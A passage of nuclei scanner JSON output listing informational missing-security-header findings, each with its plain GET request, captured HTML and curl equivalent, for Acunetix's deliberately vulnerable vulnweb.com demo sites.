vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/report\",\"path\":\"/report\",\"matched-at\":\"http://testhtml5.vulnweb.com/report\",\"request\":\"GET /report HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE html\\u003e\\n\\u003chtml lang=\\\"en\\\" xmlns=\\\"http://www.w3.org/1999/html\\\" data-ng-app=\\\"itemsApp\\\"\\u003e\\n\\u003chead\\u003e\\n \\u003cmeta charset=\\\"utf-8\\\"\\u003e\\n \\u003ctitle\\u003eSecurityTweets\\u003c/title\\u003e\\n \\u003cmeta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\"\\u003e\\n \\u003cmeta name=\\\"description\\\" content=\\\"\\\"\\u003e\\n \\u003cmeta name=\\\"author\\\" content=\\\"\\\"\\u003e\\n\\n \\u003c!-- Le styles --\\u003e\\n \\u003clink href=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003c!--\\u003clink href=\\\"http://netdna.bootstrapcdn.com/font-awesome/3.0.2/css/font-awesome.css\\\" rel=\\\"stylesheet\\\"\\u003e--\\u003e\\n \\u003clink href='http://fonts.googleapis.com/css?family=Open+Sans:700' rel='stylesheet' type='text/css'\\u003e\\n \\u003clink href=\\\"/static/css/style.css\\\" rel=\\\"stylesheet\\\"\\u003e\\n \\u003cstyle type=\\\"text/css\\\"\\u003e\\n body {\\n padding-top: 60px;\\n padding-bottom: 40px;\\n }\\n .sidebar-nav {\\n padding: 9px 0;\\n }\\n\\n @media (max-width: 980px) {\\n /* Enable use of floated navbar text */\\n .navbar-text.pull-right {\\n float: none;\\n padding-left: 5px;\\n padding-right: 5px;\\n }\\n }\\n \\u003c/style\\u003e\\n\\u003c/head\\u003e\\n\\n\\u003cbody\\u003e\\n\\n\\u003cdiv class=\\\"navbar navbar-fixed-top\\\"\\u003e\\n \\u003cdiv class=\\\"navbar-inner\\\"\\u003e\\n \\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cbutton type=\\\"button\\\" class=\\\"btn btn-navbar\\\" data-toggle=\\\"collapse\\\" data-target=\\\".nav-collapse\\\"\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003cspan class=\\\"icon-bar\\\"\\u003e\\u003c/span\\u003e\\n \\u003c/button\\u003e\\n \\u003ca class=\\\"brand\\\" href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"/static/img/logo2.png\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u0026nbsp;\\u003c/a\\u003e\\n \\u003cp class=\\\"navbar-text pull-left\\\"\\u003e\\n HTML5 test website for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e.\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e\\n \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\n\\u003cdiv class=\\\"container-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\u003cdiv class=\\\"span2\\\"\\u003e\\n \\u003cdiv class=\\\"well sidebar-nav\\\"\\u003e\\n \\u003cul class=\\\"nav nav-list\\\"\\u003e\\n \\u003cli class=\\\"nav-header\\\"\\u003eAction\\u003c/li\\u003e\\n \\u003cli class=\\\"active\\\"\\u003e\\u003ca href=\\\"#/response\\\"\\u003eResponse\\u003c/a\\u003e\\u003c/li\\u003e\\n\\n \\u003cli class=\\\"nav-header\\\"\\u003eAcunetix\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/\\\"\\u003eWebsite\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/html5-website-security/\\\"\\u003eHTML5 scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\t\\t\\t\\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/\\\"\\u003eHTML5 vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.acunetix.com/blog/\\\"\\u003eBlog\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.facebook.com/Acunetix\\\"\\u003eFacebook\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca target=\\\"_blank\\\" href=\\\"http://www.twitter.com/acunetix/\\\"\\u003eTwitter\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n \\u003c/div\\u003e\\u003c!--/.well --\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003cdiv class=\\\"span10\\\"\\u003e\\n \\u003cdiv class=\\\"row-fluid\\\"\\u003e\\n \\n Your report was submitted, thanks. \\u003c!-- invalid --\\u003e\\n \\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n \\u003c/div\\u003e\\u003c!--/span--\\u003e\\n \\u003c/div\\u003e\\u003c!--/row--\\u003e\\n\\n \\u003chr\\u003e\\n\\t\\n\\t\\u003cdiv style=\\\"background-color:lightgray;width:100%;text-align:center;font-size:14px\\\"\\u003e\\n\\t\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.\\u003c/p\\u003e\\n\\t\\u003c/div\\u003e\\n\\n \\u003cfooter\\u003e\\n \\u003cp\\u003e\\u0026copy; Acunetix Ltd. 2019\\u003c/p\\u003e\\n \\u003c/footer\\u003e\\n\\n\\u003c/div\\u003e\\u003c!--/.fluid-container--\\u003e\\n\\n\\u003c!-- Le javascript\\n================================================== --\\u003e\\n\\u003c!-- Placed at the end of the document so the pages load faster --\\u003e\\n\\u003cscript src=\\\"http://code.jquery.com/jquery-1.9.1.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js\\\"\\u003e\\u003c/script\\u003e\\n\\u003cscript src=\\\"/static/app/app.js\\\"\\u003e\\u003c/script\\u003e\\n\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:53.36276752Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 AVG/123.0.0.0' 'http://testhtml5.vulnweb.com/report'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-frame-options\",\"type\":\"http\",\"host\":\"testhtml5.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testhtml5.vulnweb.com/samples\",\"path\":\"/samples\",\"matched-at\":\"http://testhtml5.vulnweb.com/samples\",\"request\":\"GET /samples HTTP/1.1\\r\\nHost: testhtml5.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=utf-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\n\\u003chead\\u003e\\n \\u003ctitle\\u003ePython samples\\u003c/title\\u003e\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e\\n \\u003ch3\\u003eSimple python programs:\\u003c/h3\\u003e\\n \\u003cul\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eFirst sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003cli\\u003e\\u003ca href=\\\"/getfile?fname=sample1.py\\\"\\u003eSecond sample\\u003c/a\\u003e\\u003c/li\\u003e\\n \\u003c/ul\\u003e\\n\\u003c/body\\u003e\\n\\u003c/html\\u003e\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:40:53.362794774Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36' 'http://testhtml5.vulnweb.com/samples'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"permissions-policy\",\"type\":\"http\",\"host\":\"testasp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testasp.vulnweb.com\",\"matched-at\":\"http://testasp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testasp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 3541\\r\\nCache-Control: private\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:40:45 GMT\\r\\nServer: Microsoft-IIS/8.5\\r\\nSet-Cookie: ASPSESSIONIDSASBSTRC=LIKALMIBLAODJLDJGONMEJAO; path=/\\r\\nX-Powered-By: ASP.NET\\r\\n\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\" \\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\r\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/MainTemplate.dwt.asp\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\r\\n\\u003chead\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"doctitle\\\" --\\u003e\\r\\n\\u003ctitle\\u003eacuforum forums\\u003c/title\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-1\\\"\\u003e\\r\\n\\u003c!-- InstanceBeginEditable name=\\\"head\\\" --\\u003e\\r\\n\\u003c!-- InstanceEndEditable --\\u003e\\r\\n\\u003clink href=\\\"styles.css\\\" rel=\\\"stylesheet\\\" type=\\\"text/css\\\"\\u003e\\r\\n\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e \\r\\n\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellpadding=\\\"10\\\" cellspacing=\\\"0\\\"\\u003e \\r\\n \\u003ctr bgcolor=\\\"#008F00\\\"\\u003e \\r\\n \\u003ctd width=\\\"306px\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"Images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003ctd align=\\\"right\\\" valign=\\\"middle\\\" bgcolor=\\\"#008F00\\\" class=\\\"disclaimer\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003cdiv class=\\\"menubar\\\"\\u003e\\u003ca href=\\\"Templatize.asp?item=html/about.html\\\" class=\\\"menu\\\"\\u003eabout\\u003c/a\\u003e - \\u003ca href=\\\"Default.asp\\\" class=\\\"menu\\\"\\u003eforums\\u003c/a\\u003e - \\u003ca href=\\\"Search.asp\\\" class=\\\"menu\\\"\\u003esearch\\u003c/a\\u003e \\r\\n - \\u003ca href=\\\"./Login.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003elogin\\u003c/a\\u003e - \\u003ca href=\\\"./Register.asp?RetURL=%2FDefault%2Easp%3F\\\" class=\\\"menu\\\"\\u003eregister\\u003c/a\\u003e \\r\\n\\t- \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL scanner\\u003c/a\\u003e - \\u003ca href=\\\"https://www.acunetix.com/websitesecurity/sql-injection/\\\" class=\\\"menu\\\"\\u003eSQL vuln help\\u003c/a\\u003e\\r\\n \\u003c/div\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\"\\u003e\\u003c!-- InstanceBeginEditable name=\\\"MainContentLeft\\\" --\\u003e\\r\\n\\t\\u003ctable width=\\\"100%\\\" border=\\\"0\\\" cellspacing=\\\"0\\\" cellpadding=\\\"5\\\"\\u003e\\r\\n \\u003ctr\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eForum\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eThreads\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003ePosts\\u003c/td\\u003e\\r\\n \\u003ctd class=\\\"tableheader\\\"\\u003eLast Post\\u003c/td\\u003e\\r\\n \\u003c/tr\\u003e \\r\\n\\t\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=0'\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eTalk about Acunetix Web Vulnerablity Scanner\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e82\\u003c/td\\u003e\\u003ctd\\u003e11/13/2024 2:31:30 AM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#e9ffe9'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=1'\\u003eWeather\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eWhat weather is in your town right now\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e1\\u003c/td\\u003e\\u003ctd\\u003e11/9/2005 12:16:35 PM\\u003c/td\\u003e\\u003c/tr\\u003e\\u003ctr bgcolor='#FFFFFF'\\u003e\\u003ctd\\u003e\\u003cdiv class='forumtitle'\\u003e\\u003ca href='showforum.asp?id=2'\\u003eMiscellaneous\\u003c/a\\u003e\\u003c/div\\u003e\\u003cdiv class='forumdescription'\\u003eAnything crossing your mind can be posted here\\u003c/div\\u003e\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e0\\u003c/td\\u003e\\u003ctd\\u003e\\u003c/td\\u003e\\u003c/tr\\u003e\\r\\n\\t\\u003c/table\\u003e\\u003c!-- InstanceEndEditable --\\u003e\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n \\u003ctr align=\\\"right\\\" bgcolor=\\\"#FFFFFF\\\"\\u003e \\r\\n \\u003ctd colspan=\\\"2\\\" class=\\\"footer\\\"\\u003eCopyright 2019 Acunetix Ltd.\\u003c/td\\u003e \\r\\n \\u003c/tr\\u003e \\r\\n\\u003c/table\\u003e \\r\\n\\u003cdiv style=\\\"background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px\\\"\\u003e\\r\\n\\t\\u003cp style=\\\"padding-left:20%;padding-right:20%\\\"\\u003e\\u003cb\\u003eWarning\\u003c/b\\u003e: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.\\u003c/p\\u003e\\r\\n\\u003c/div\\u003e\\r\\n\\u003c/body\\u003e\\r\\n\\u003c!-- InstanceEnd --\\u003e\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.238.29.244\",\"timestamp\":\"2024-11-13T02:40:53.362790293Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Edg/123.0.2420.102' 'http://testasp.vulnweb.com'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com\",\"matched-at\":\"http://testphp.vulnweb.com\",\"request\":\"GET / HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; en-US; rv:122.0esr) Gecko/20100209 Firefox/122.0esr\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html; charset=UTF-8\\r\\nDate: Wed, 13 Nov 2024 02:40:49 GMT\\r\\nServer: nginx/1.19.0\\r\\nX-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1\\r\\n\\r\\n\\u003c!DOCTYPE HTML PUBLIC \\\"-//W3C//DTD HTML 4.01 Transitional//EN\\\"\\n\\\"http://www.w3.org/TR/html4/loose.dtd\\\"\\u003e\\n\\u003chtml\\u003e\\u003c!-- InstanceBegin template=\\\"/Templates/main_dynamic_template.dwt.php\\\" codeOutsideHTMLIsLocked=\\\"false\\\" --\\u003e\\n\\u003chead\\u003e\\n\\u003cmeta http-equiv=\\\"Content-Type\\\" content=\\\"text/html; charset=iso-8859-2\\\"\\u003e\\n\\n\\u003c!-- InstanceBeginEditable name=\\\"document_title_rgn\\\" --\\u003e\\n\\u003ctitle\\u003eHome of Acunetix Art\\u003c/title\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003clink rel=\\\"stylesheet\\\" href=\\\"style.css\\\" type=\\\"text/css\\\"\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"headers_rgn\\\" --\\u003e\\n\\u003c!-- here goes headers headers --\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003cscript language=\\\"JavaScript\\\" type=\\\"text/JavaScript\\\"\\u003e\\n\\u003c!--\\nfunction MM_reloadPage(init) { //reloads the window if Nav4 resized\\n if (init==true) with (navigator) {if ((appName==\\\"Netscape\\\")\\u0026\\u0026(parseInt(appVersion)==4)) {\\n document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}\\n else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();\\n}\\nMM_reloadPage(true);\\n//--\\u003e\\n\\u003c/script\\u003e\\n\\n\\u003c/head\\u003e\\n\\u003cbody\\u003e \\n\\u003cdiv id=\\\"mainLayer\\\" style=\\\"position:absolute; width:700px; z-index:1\\\"\\u003e\\n\\u003cdiv id=\\\"masthead\\\"\\u003e \\n \\u003ch1 id=\\\"siteName\\\"\\u003e\\u003ca href=\\\"https://www.acunetix.com/\\\"\\u003e\\u003cimg src=\\\"images/logo.gif\\\" width=\\\"306\\\" height=\\\"38\\\" border=\\\"0\\\" alt=\\\"Acunetix website security\\\"\\u003e\\u003c/a\\u003e\\u003c/h1\\u003e \\n \\u003ch6 id=\\\"siteInfo\\\"\\u003eTEST and Demonstration site for \\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/\\\"\\u003eAcunetix Web Vulnerability Scanner\\u003c/a\\u003e\\u003c/h6\\u003e\\n \\u003cdiv id=\\\"globalNav\\\"\\u003e \\n \\t\\u003ctable border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\"\\u003e\\u003ctr\\u003e\\n\\t\\u003ctd align=\\\"left\\\"\\u003e\\n\\t\\t\\u003ca href=\\\"index.php\\\"\\u003ehome\\u003c/a\\u003e | \\u003ca href=\\\"categories.php\\\"\\u003ecategories\\u003c/a\\u003e | \\u003ca href=\\\"artists.php\\\"\\u003eartists\\n\\t\\t\\u003c/a\\u003e | \\u003ca href=\\\"disclaimer.php\\\"\\u003edisclaimer\\u003c/a\\u003e | \\u003ca href=\\\"cart.php\\\"\\u003eyour cart\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"guestbook.php\\\"\\u003eguestbook\\u003c/a\\u003e | \\n\\t\\t\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\n\\t\\u003c/td\\u003e\\n\\t\\u003ctd align=\\\"right\\\"\\u003e\\n\\t\\t\\u003c/td\\u003e\\n\\t\\u003c/tr\\u003e\\u003c/table\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\u003c!-- end masthead --\\u003e \\n\\n\\u003c!-- begin content --\\u003e\\n\\u003c!-- InstanceBeginEditable name=\\\"content_rgn\\\" --\\u003e\\n\\u003cdiv id=\\\"content\\\"\\u003e\\n\\t\\u003ch2 id=\\\"pageName\\\"\\u003ewelcome to our page\\u003c/h2\\u003e\\n\\t \\u003cdiv class=\\\"story\\\"\\u003e\\n\\t\\t\\u003ch3\\u003eTest site for Acunetix WVS.\\u003c/h3\\u003e\\n\\t \\u003c/div\\u003e\\n\\u003c/div\\u003e\\n\\u003c!-- InstanceEndEditable --\\u003e\\n\\u003c!--end content --\\u003e\\n\\n\\u003cdiv id=\\\"navBar\\\"\\u003e \\n \\u003cdiv id=\\\"search\\\"\\u003e \\n \\u003cform action=\\\"search.php?test=query\\\" method=\\\"post\\\"\\u003e \\n \\u003clabel\\u003esearch art\\u003c/label\\u003e \\n \\u003cinput name=\\\"searchFor\\\" type=\\\"text\\\" size=\\\"10\\\"\\u003e \\n \\u003cinput name=\\\"goButton\\\" type=\\\"submit\\\" value=\\\"go\\\"\\u003e \\n \\u003c/form\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"sectionLinks\\\"\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"categories.php\\\"\\u003eBrowse categories\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"artists.php\\\"\\u003eBrowse artists\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"cart.php\\\"\\u003eYour cart\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"login.php\\\"\\u003eSignup\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"userinfo.php\\\"\\u003eYour profile\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"guestbook.php\\\"\\u003eOur guestbook\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t\\t\\u003cli\\u003e\\u003ca href=\\\"AJAX/index.php\\\"\\u003eAJAX Demo\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv class=\\\"relatedLinks\\\"\\u003e \\n \\u003ch3\\u003eLinks\\u003c/h3\\u003e \\n \\u003cul\\u003e \\n \\u003cli\\u003e\\u003ca href=\\\"http://www.acunetix.com\\\"\\u003eSecurity art\\u003c/a\\u003e\\u003c/li\\u003e \\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/vulnerability-scanner/php-security-scanner/\\\"\\u003ePHP scanner\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/\\\"\\u003ePHP vuln help\\u003c/a\\u003e\\u003c/li\\u003e\\n\\t \\u003cli\\u003e\\u003ca href=\\\"http://www.eclectasy.com/Fractal-Explorer/index.html\\\"\\u003eFractal Explorer\\u003c/a\\u003e\\u003c/li\\u003e \\n \\u003c/ul\\u003e \\n \\u003c/div\\u003e \\n \\u003cdiv id=\\\"advert\\\"\\u003e \\n \\u003cp\\u003e\\n \\u003cobject classid=\\\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\\\" codebase=\\\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\n \\u003cparam name=\\\"movie\\\" value=\\\"Flash/add.swf\\\"\\u003e\\n \\u003cparam name=quality value=high\\u003e\\n \\u003cembed src=\\\"Flash/add.swf\\\" quality=high pluginspage=\\\"http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash\\\" type=\\\"application/x-shockwave-flash\\\" width=\\\"107\\\" height=\\\"66\\\"\\u003e\\u003c/embed\\u003e\\n \\u003c/object\\u003e\\n \\u003c/p\\u003e\\n \\u003c/div\\u003e \\n\\u003c/div\\u003e \\n\\n\\u003c!--end navbar --\\u003e \\n\\u003cdiv 